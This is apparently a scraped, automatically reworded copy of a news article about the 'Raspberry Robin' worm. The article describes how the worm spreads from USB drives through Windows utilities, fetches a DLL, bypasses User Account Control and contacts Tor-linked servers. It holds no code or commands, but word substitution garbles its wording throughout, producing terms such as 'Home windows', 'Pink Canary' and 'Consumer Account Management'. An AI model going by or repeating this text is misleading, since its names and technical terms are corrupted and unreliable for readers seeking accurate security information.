Sunday, May 15, 2022
HomeCyber SecurityResearchers Warn of 'Raspberry Robin' Malware Spreading through Exterior Drives

Researchers Warn of ‘Raspberry Robin’ Malware Spreading through Exterior Drives

Cybersecurity researchers have found a brand new Home windows malware with worm-like capabilities and is propagated by way of detachable USB gadgets.

Attributing the malware to a cluster named “Raspberry Robin,” Pink Canary researchers famous that the worm “leverages Home windows Installer to achieve out to QNAP-associated domains and obtain a malicious DLL.”

The earliest indicators of the exercise are stated thus far again to September 2021, with infections noticed in organizations with ties to know-how and manufacturing sectors.

Assault chains pertaining to Raspberry Robin begin with connecting an contaminated USB drive to a Home windows machine. Current inside the gadget is the worm payload, which seems as a .LNK shortcut file to a reputable folder.

Raspberry Robin

The worm then takes care of spawning a brand new course of utilizing cmd.exe to learn and execute a malicious file saved on the exterior drive.

That is adopted by launching explorer.exe and msiexec.exe, the latter of which is used for exterior community communication to a rogue area for command-and-control (C2) functions and to obtain and set up a DLL library file.

The malicious DLL is subsequently loaded and executed utilizing a sequence of reputable Home windows utilities equivalent to fodhelper.exe, rundll32.exe to rundll32.exe, and odbcconf.exe, successfully bypassing Consumer Account Management (UAC).

Additionally frequent throughout Raspberry Robin detections is the presence of outbound C2 contact involving the processes regsvr32.exe, rundll32.exe, and dllhost.exe to IP addresses related to Tor nodes.

That stated, the operators’ aims stay unanswered at this stage. It is also unclear how and the place the exterior drives are contaminated, though it is suspected that it is carried out offline.

“We additionally do not know why Raspberry Robin installs a malicious DLL,” the researchers stated. “One speculation is that it could be an try to determine persistence on an contaminated system.”



Please enter your comment!
Please enter your name here

Most Popular

Recent Comments